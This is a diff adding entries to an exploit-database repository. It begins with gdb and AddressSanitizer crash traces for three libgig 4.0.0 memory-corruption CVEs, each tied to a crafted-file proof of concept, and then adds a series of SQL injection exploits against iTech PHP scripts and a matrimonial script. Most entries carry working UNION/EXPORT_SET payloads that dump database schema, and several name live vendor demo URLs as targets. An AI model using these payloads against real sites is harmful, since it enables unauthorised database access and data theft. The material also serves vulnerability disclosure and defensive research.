 => 0x00007ffff7ba7f61 <+49>:cmpb   $0x0,(%rax)
   0x00007ffff7ba7f64 <+52>:je     0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
   0x00007ffff7ba7f66 <+54>:mov    $0x1,%r9d
   0x00007ffff7ba7f6c <+60>:xor    %ecx,%ecx
   0x00007ffff7ba7f6e <+62>:jmp    0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
   0x00007ffff7ba7f70 <+64>:cmpb   $0x0,(%rsi,%r9,1)
   0x00007ffff7ba7f75 <+69>:lea    0x1(%r9),%r8
   0x00007ffff7ba7f79 <+73>:je     0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
   0x00007ffff7ba7f7b <+75>:mov    %r8,%r9
   0x00007ffff7ba7f7e <+78>:add    $0x1,%ecx
   0x00007ffff7ba7f81 <+81>:cmp    %r10d,%ecx
   0x00007ffff7ba7f84 <+84>:jne    0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
   0x00007ffff7ba7f86 <+86>:movslq %ecx,%rdx
   0x00007ffff7ba7f89 <+89>:mov    %rbx,%rdi
   0x00007ffff7ba7f8c <+92>:callq  0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
   0x00007ffff7ba7f91 <+97>:add    $0x8,%rsp
   0x00007ffff7ba7f95 <+101>:mov    %rbp,%rdi
   0x00007ffff7ba7f98 <+104>:pop    %rbx
   0x00007ffff7ba7f99 <+105>:pop    %rbp
 ---Type <return> to continue, or q <return> to quit---q
 Quit
 (gdb) i r
 rax            0x00
 rbx            0x6092386328888
 rcx            0x7ffff739f9f7140737341159927
 rdx            0x7ffff5d9f000140737318088704
 rsi            0x00
 rdi            0x7ffff5d9f000140737318088704
 rbp            0x6095d00x6095d0
 rsp            0x7fffffffdd800x7fffffffdd80
 r8             0xffffffff4294967295
 r9             0x00
 r10            0x100001a16777242
 r11            0x247583
 r12            0x6092206328864
 r13            0x7fffffffdfa0140737488347040
 r14            0x00
 r15            0x6091a06328736
 rip            0x7ffff7ba7f610x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
 eflags         0x10202[ IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 ---Type <return> to continue, or q <return> to quit---
 fs             0x00
 gs             0x00
 (gdb)
 ASAN:SIGSEGV
 =================================================================
 ==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
 AddressSanitizer can not provide additional info.
    #0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
    #1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
    #2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
    #3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
    #4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
    #5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
    #6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
    #7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
 SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
 ==41244== ABORTING
 POC:
 libgig_4.0.0_null_pointer_dereference_2.gig
 CVE:
 CVE-2017-12952
 4.
 the gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory write and application crash) via a crafted gig file.
 ./gigdump libgig_4.0.0_invalid_memory_write.gig
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
 4445                RegionKeyTable[iKey] = pRegion;
 (gdb) bt
 #0  gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
    at gig.cpp:4445
 #1  0x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0, 
    pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
    at gig.cpp:4409
 #2  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
 #3  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
 #4  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
 #5  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
 (gdb) disassemble 
 Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
   0x00007ffff7bba240 <+0>:xor    %eax,%eax
   0x00007ffff7bba242 <+2>:nopw   0x0(%rax,%rax,1)
   0x00007ffff7bba248 <+8>:movq   $0x0,0x80(%rdi,%rax,1)
   0x00007ffff7bba254 <+20>:add    $0x8,%rax
   0x00007ffff7bba258 <+24>:cmp    $0x400,%rax
   0x00007ffff7bba25e <+30>:jne    0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
   0x00007ffff7bba260 <+32>:mov    0x60(%rdi),%r9
   0x00007ffff7bba264 <+36>:mov    (%r9),%r8
   0x00007ffff7bba267 <+39>:cmp    %r9,%r8
   0x00007ffff7bba26a <+42>:je     0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
   0x00007ffff7bba26c <+44>:nopl   0x0(%rax)
   0x00007ffff7bba270 <+48>:mov    0x10(%r8),%rcx
   0x00007ffff7bba274 <+52>:movzwl 0x78(%rcx),%eax
   0x00007ffff7bba278 <+56>:movzwl 0x7a(%rcx),%esi
   0x00007ffff7bba27c <+60>:cmp    %esi,%eax
   0x00007ffff7bba27e <+62>:jg     0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
   0x00007ffff7bba280 <+64>:add    $0x1,%esi
   0x00007ffff7bba283 <+67>:nopl   0x0(%rax,%rax,1)
   0x00007ffff7bba288 <+72>:movslq %eax,%rdx
 ---Type <return> to continue, or q <return> to quit---
   0x00007ffff7bba28b <+75>:add    $0x1,%eax
   0x00007ffff7bba28e <+78>:cmp    %esi,%eax
 => 0x00007ffff7bba290 <+80>:mov    %rcx,0x80(%rdi,%rdx,8)
   0x00007ffff7bba298 <+88>:jne    0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
   0x00007ffff7bba29a <+90>:mov    (%r8),%r8
   0x00007ffff7bba29d <+93>:cmp    %r8,%r9
   0x00007ffff7bba2a0 <+96>:jne    0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
   0x00007ffff7bba2a2 <+98>:repz retq 
   0x00007ffff7bba2a4 <+100>:repz retq 
 End of assembler dump.
 (gdb) i r
 rax            0x3fbd16317
 rbx            0x60a1a06332832
 rcx            0x60d5806346112
 rdx            0x3fbc16316
 rsi            0x420116897
 rdi            0x60a1a06332832
 rbp            0x7fffffffdd900x7fffffffdd90
 rsp            0x7fffffffdd080x7fffffffdd08
 r8             0x60e7406350656
 r9             0x60b0f06336752
 r10            0x7fffffffdad0140737488345808
 r11            0x7ffff7bba240140737349657152
 r12            0x00
 r13            0x60a0c06332608
 r14            0x60a9806334848
 r15            0x60d5806346112
 rip            0x7ffff7bba2900x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
 eflags         0x10283[ CF SF IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 ---Type <return> to continue, or q <return> to quit---
 fs             0x00
 gs             0x00
 (gdb)
 ASAN:SIGSEGV
 =================================================================
 ==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
 AddressSanitizer can not provide additional info.
    #0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
    #1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
    #2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
 SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
 ==43045== ABORTING
 POC:
 libgig_4.0.0_invalid_memory_write.gig
 CVE:
 CVE-2017-12953
 5.
 the gig::Region::GetSampleFromWavePool function in gig.cpp in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory read and application crash) via a crafted gig file.
 ./gigdump libgig_4.0.0_invalid_memory_read.gig
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
    WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
 3849        unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
 (gdb) bt
 #0  gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
    WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
 #1  0x00007ffff7bc07df in gig::Region::Region (this=0x612520, 
    pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
 #2  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
    pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
    at gig.cpp:4404
 #3  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
 #4  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
 #5  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
 #6  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
 (gdb) disassemble 
 Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
   0x00007ffff7bbac00 <+0>:cmp    $0xffffffff,%esi
   0x00007ffff7bbac03 <+3>:je     0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
   0x00007ffff7bbac05 <+5>:push   %r12
   0x00007ffff7bbac07 <+7>:push   %rbp
   0x00007ffff7bbac08 <+8>:push   %rbx
   0x00007ffff7bbac09 <+9>:mov    0x18(%rdi),%rax
   0x00007ffff7bbac0d <+13>:mov    0x18(%rax),%rbx
   0x00007ffff7bbac11 <+17>:mov    0x78(%rbx),%rax
   0x00007ffff7bbac15 <+21>:test   %rax,%rax
   0x00007ffff7bbac18 <+24>:je     0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
   0x00007ffff7bbac1a <+26>:mov    %esi,%ecx
   0x00007ffff7bbac1c <+28>:mov    %rbx,%rdi
   0x00007ffff7bbac1f <+31>:mov    %rdx,%rsi
 => 0x00007ffff7bbac22 <+34>:mov    (%rax,%rcx,4),%ebp
   0x00007ffff7bbac25 <+37>:mov    0x80(%rbx),%rax
   0x00007ffff7bbac2c <+44>:mov    (%rax,%rcx,4),%r12d
   0x00007ffff7bbac30 <+48>:callq  0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
   0x00007ffff7bbac35 <+53>:test   %rax,%rax
 ---Type <return> to continue, or q <return> to quit---q
 Quit
 (gdb) i r
 rax            0x609f806332288
 rbx            0x6091606328672
 rcx            0xff0000004278190080
 rdx            0x00
 rsi            0x00
 rdi            0x6091606328672
 rbp            0x00x0
 rsp            0x7fffffffdc900x7fffffffdc90
 r8             0x00
 r9             0x22
 r10            0x00
 r11            0x246582
 r12            0x6131906369680
 r13            0x6125206366496
 r14            0x00
 r15            0x00
 rip            0x7ffff7bbac220x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
 eflags         0x10202[ IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 ---Type <return> to continue, or q <return> to quit---
 fs             0x00
 gs             0x00
 (gdb)
 ASAN:SIGSEGV
 =================================================================
 ==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
 AddressSanitizer can not provide additional info.
    #0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
    #1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
 SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
 ==44028== ABORTING
 POC:
 libgig_4.0.0_invalid_memory_read.gig
 CVE:
 CVE-2017-12954
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42546.zip
--- a/platforms/php/webapps/42505.txt
+++ b/platforms/php/webapps/42505.txt
@ -0,0 +1,36 @@
 # # # # #
 # Exploit Title: Itech B2B Script 4.42 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/c/B2B/
 # Demo: http://b2b.itechscripts.com/
 # Version: 4.42
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE:
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 # http://localhost/[PATH]/catcompany.php?token=[SQL]
 # -1048a1d0c6e83f027327d8461063f4ac58a6'+/*!22222union*/+/*!22222select*/+0x31,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x33,0x34,0x35,0x36--+-
 #
 # http://localhost/[PATH]/search.php?keywords=[SQL]
 #
 # http://localhost/[PATH]/search.php?rctyp=[SQL]
 #
 # http://localhost/[PATH]/buyleads-details.php?id=[SQL]
 #
 # http://localhost/[PATH]/category.php?token=[SQL]
 #
 # http://localhost/[PATH]/company/index.php?c=[SQL]
 #
 # Reference:
 # 
 # # # # #
--- a/platforms/php/webapps/42506.txt
+++ b/platforms/php/webapps/42506.txt
@ -0,0 +1,27 @@
 # # # # #
 # Exploit Title: iTech Business Networking Script 8.26 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage: http://itechscripts.com/
 # Software Link: http://itechscripts.com/business-networking-script/
 # Demo: http://professional-network.itechscripts.com/
 # Version: 8.26
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/group.php?grid=[SQL]
 # -1'+/*!22222union*/+/*!22222select*/+0x31,0x32,0x33,0x34,0x35,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134--+-
 #
 # http://localhost/[PATH]/join_group.php?id=[SQL]
 #
 # # # # #
--- a/platforms/php/webapps/42507.txt
+++ b/platforms/php/webapps/42507.txt
@ -0,0 +1,67 @@
 # # # # #
 # Exploit Title: iTech Caregiver Script 2.71 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/caregiver-script/
 # Demo: http://caregiver.itechscripts.com/
 # Version: 2.71
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/searchSitter.php?myCity=[SQL]
 # -1'+/*!22222union*/+/*!22222select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
 #
 # http://localhost/[PATH]/searchSitter.php?sitterService=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?age=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?gender=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?lastLoginElapsedInDays=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?yearsOfExperience=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?collegeLevel=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?fullPartTime=[SQL]
 #
 # http://localhost/[PATH]/searchSitter.php?liveInOut=[SQL]
 #
 # http://localhost/[PATH]/searchJob.php?sitterService=[SQL]
 #
 # http://localhost/[PATH]/searchJob.php?jobType=[SQL]
 #
 # http://localhost/[PATH]/searchJob.php?jobFrequency=[SQL]
 #
 # Etc...
 # # # # #
 http://caregiver.itechscripts.com/searchSitter.php?myCity=-1'+/*!22222union*/+/*!22222select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
 http://caregiver.itechscripts.com/searchSitter.php?sitterService=1'
 http://caregiver.itechscripts.com/searchSitter.php?myCity=1'
 http://caregiver.itechscripts.com/searchSitter.php?age=1'
 http://caregiver.itechscripts.com/searchSitter.php?gender=1'
 http://caregiver.itechscripts.com/searchSitter.php?lastLoginElapsedInDays=1'
 http://caregiver.itechscripts.com/searchSitter.php?yearsOfExperience=1'
 http://caregiver.itechscripts.com/searchSitter.php?collegeLevel=1'
 http://caregiver.itechscripts.com/searchSitter.php?fullPartTime=1'
 http://caregiver.itechscripts.com/searchSitter.php?liveInOut=1'
 http://caregiver.itechscripts.com/searchJob.php?sitterService=2'
 http://caregiver.itechscripts.com/searchJob.php?jobType=2'
 http://caregiver.itechscripts.com/searchJob.php?jobFrequency=2'
--- a/platforms/php/webapps/42508.txt
+++ b/platforms/php/webapps/42508.txt
@ -0,0 +1,30 @@
 # # # # #
 # Exploit Title: iTech Classifieds Script 7.41 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/classifieds-script/
 # Demo: http://classifieds.itechscripts.com/
 # Version: 7.41
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/message.php?pid=[SQL]
 # -13++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532--+-
 #
 # http://localhost/[PATH]/userlistings.php?id=[SQL]
 #
 # http://localhost/[PATH]/show_like.php?cid=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42509.txt
+++ b/platforms/php/webapps/42509.txt
@ -0,0 +1,32 @@
 # # # # #
 # Exploit Title: iTech Image Sharing Script 4.13 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/image-sharing-script/
 # Demo: http://photo-sharing.itechscripts.com/
 # Version: 4.13
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/pinDetails.php?token=[SQL]
 # -7136c4ca4238a0b923820dcc509a6f75849b'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x2832302)--+-
 #
 # http://localhost/[PATH]/boardpage.php?token=[SQL]
 #
 # http://localhost/[PATH]/searchpin.php?q=[SQL]
 #
 # http://localhost/[PATH]/profilepage.php?token=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42510.txt
+++ b/platforms/php/webapps/42510.txt
@ -0,0 +1,29 @@
 # # # # #
 # Exploit Title: iTech Freelancer Script 5.27 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/freelancer-script/
 # Demo: http://freelance.itechscripts.com/
 # Version: 5.27
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/profile.php?u=[SQL]
 # -c4ca4238a0b923820dcc509a6f75849b'+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529)--+-
 #
 # http://localhost/[PATH]/showSkill.php?cat=[SQL]
 # -1+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429)--+-
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42511.txt
+++ b/platforms/php/webapps/42511.txt
@ -0,0 +1,28 @@
 # # # # #
 # Exploit Title: iTech Travel Script 9.49 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/travel-portal-script/
 # Demo: http://travelportal.itechscripts.com/
 # Version: 9.49
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 #
 # http://localhost/[PATH]/hotel_view.php?id=[SQL]
 # -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029)--+-
 #
 # http://localhost/[PATH]/bus_details.php?id=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42513.txt
+++ b/platforms/php/webapps/42513.txt
@ -0,0 +1,28 @@
 # # # # #
 # Exploit Title: iTech Multi Vendor Script 6.63 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/multi-vendor-shopping-script/
 # Demo: http://multi-vendor.itechscripts.com/
 # Version: 6.63
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 # 
 # http://localhost/[PATH]/search.php?category_id=[SQL]
 # -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-
 # 
 #  http://localhost/[PATH]/product.php?id=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42545.txt
+++ b/platforms/php/webapps/42545.txt
@ -0,0 +1,44 @@
 # # # # # 
 # Exploit Title: Matrimonial Script - SQL Injection
 # Dork: N/A
 # Date: 22.08.2017
 # Vendor Homepage: http://www.scubez.net/
 # Software Link: http://www.mscript.in/
 # Demo: http://www.mscript.in/matrimonial-demo.html
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 # 	
